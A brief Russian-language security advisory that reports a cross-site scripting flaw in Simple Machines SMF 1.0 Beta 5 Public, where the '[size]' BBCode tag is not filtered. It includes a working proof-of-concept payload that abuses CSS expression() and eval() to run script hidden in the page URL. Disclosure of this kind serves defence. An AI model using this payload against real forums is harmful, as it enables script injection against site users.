Программа: Simple 1.0 Beta 5 Public 

Уязвимость обнаружена в Simple Machines SMF. Удаленный пользователь может выполнить XSS нападение.
SMF не фильтрует данные, представленные пользователем в тэге ‘[size]’. Пример:

[size=expression(eval(unescape(document.URL. substring(document.URL.length-41,document.URL.
length))))]Big Exploit[/size]



Оставить мнение